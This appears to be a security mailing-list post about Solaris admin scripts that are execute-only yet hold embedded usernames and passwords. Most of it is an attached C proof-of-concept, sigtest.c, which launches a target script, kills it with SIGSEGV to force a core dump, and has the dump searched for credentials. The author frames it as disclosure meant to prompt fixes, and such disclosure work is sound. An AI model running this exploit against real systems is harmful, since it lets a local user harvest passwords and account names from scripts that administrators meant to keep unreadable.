Hi,
We all know that old chestnut about tracing setuid programs or scripts,
but what about non-setuid scripts which have been installed for users and
given execute only permission. For example, a lot of sites provide scripts
for users to run which perform some admin related function and thus have
usernames or passwords within them - potentially free to users.
The thing I want to do is make a few people think about fixing this by
taking whatever steps are necessary on a per-installation basis. It is a
silly kind of thing which seems to be overlooked all too often. There is
some trivial code attached for those who really do not see my point.
This is bound to be covered somewhere, I just want to get viewpoints.
Jon.
/* sigtest.c
* A quick and dirty hack for proof of concept exploit against local Solaris
* system scripts which have +x permission without +r. This allows the user
* to obtain a dump of the process memory space and run strings or similar
* tool to quickly obtain useful information such as usernames and passwords.
* Motto: catch those signals.
*
* Use: run the program, read the core dump. No rocket science required and
* obviously no exploit code either given a suitable shell environment. Yes,
* it is stupid but it does work on too many systems and needs to be fixed.
*
* Compile using "gcc -Wall --pedantic-errors -o sigtest sigtest.c"
*/
/* Include useful header files. */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <signal.h>
#define CHILD_ARGV_LENGTH 2
#define TRUE 1
int main(int argc, char *argv[]) {
int child_pid = 0;
char *child_argv[CHILD_ARGV_LENGTH];
struct rlimit rlp;
if (argc != 2) {
printf("Usage:\n%s command\n",argv[0]);
exit(1);
}
child_argv[0] = argv[1];
printf("The entertainment starts here...\n");
if ((child_pid = fork()) == 0) {
if (getrlimit(RLIMIT_CORE, &rlp) != 0) {
printf("Could not get limits.\n");
exit(1);
} else {
printf("The current limit is: %d.\n",(int)rlp.rlim_cur);
}
printf("I am the child process and my process id is %d\n",
(int)getpid());
/* child_argv[0] = "./test_script.sh"; */
child_argv[1] = NULL;
printf("Invoking program: %s\n",child_argv[0]);
fflush(stdout);
if (execv(child_argv[0],child_argv) == -1) {
printf("A descriptive error message.\n");
}
/* system("/bin/ls"); */ /* An alternative which forks. */
printf("This point is never reached normally\n");
} else {
/* This is the horribly ugly bit where we sleep for an empirical amount of
time. Obviously this is not the correct way to write a general purpose
exploit - but that was not the point of this code. Go fix if you really
have no life :-) Perhaps some sem or other process sync can go here. */
usleep(10000);
while(TRUE) {
if (kill(child_pid,SIGSEGV) == 0) {
printf("The package was delivered.\n");
break;
}
}
waitpid(child_pid,NULL,0); /* could use wait() also. */
}
printf("Main program exits normally\n");
return 0; /* return something */
}
